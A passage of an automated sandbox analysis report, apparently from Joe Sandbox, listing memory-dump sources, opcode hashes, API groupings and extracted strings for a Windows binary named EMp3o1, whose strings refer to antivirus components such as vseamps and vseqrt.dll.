                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: -
                                                • API String ID: 0-2547889144
                                                • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                                • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: -
                                                • API String ID: 0-2547889144
                                                • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                                • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                                • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: -
                                                • API String ID: 0-2547889144
                                                • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                                • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: -
                                                • API String ID: 0-2547889144
                                                • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                                • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: -
                                                • API String ID: 0-2547889144
                                                • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                                • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                                • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                                • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                                • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                • Instruction ID: a19c88478e72874a165f17089b31f7b862f48a17d5e1cfae8d43cfdec99ca76e
                                                • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                • Instruction Fuzzy Hash: 76F06271B1A2958AEFA48F28A852B3977D0E7483D1F948039D69D83B14D73CD4609F0C

                                                Control-flow Graph

                                                control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 357 140003d35-140003d49 353->357 355 1400039f3-140003a04 #4 354->355 356 140003a09-140003a1a EnterCriticalSection 354->356 355->356 358 140003a67 356->358 359 140003a1c-140003a34 356->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->357
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                                • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                                • API String ID: 1021822269-3147033232
                                                • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                                • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                                • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                                • API String ID: 883923345-381368982
                                                • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                                • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                                • String ID:
                                                • API String ID: 1613947383-0
                                                • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                                • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                • String ID:
                                                • API String ID: 1995290849-0
                                                • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                                • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                • String ID:
                                                • API String ID: 1995290849-0
                                                • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                                • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                                • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                • API String ID: 93015348-1041928032
                                                • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                                • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                                • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                                • API String ID: 3682727354-300733478
                                                • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                                • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                                • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                                • API String ID: 2587151837-1427723692
                                                • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                                • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                                • String ID: SetDllDirectoryW$kernel32.dll
                                                • API String ID: 3184163350-3826188083
                                                • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                                • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcesslstrlen
                                                • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                • API String ID: 3424473247-996641649
                                                • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                                • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: String$ByteCharMultiWide$ErrorLast
                                                • String ID:
                                                • API String ID: 1775797328-0
                                                • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                                • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
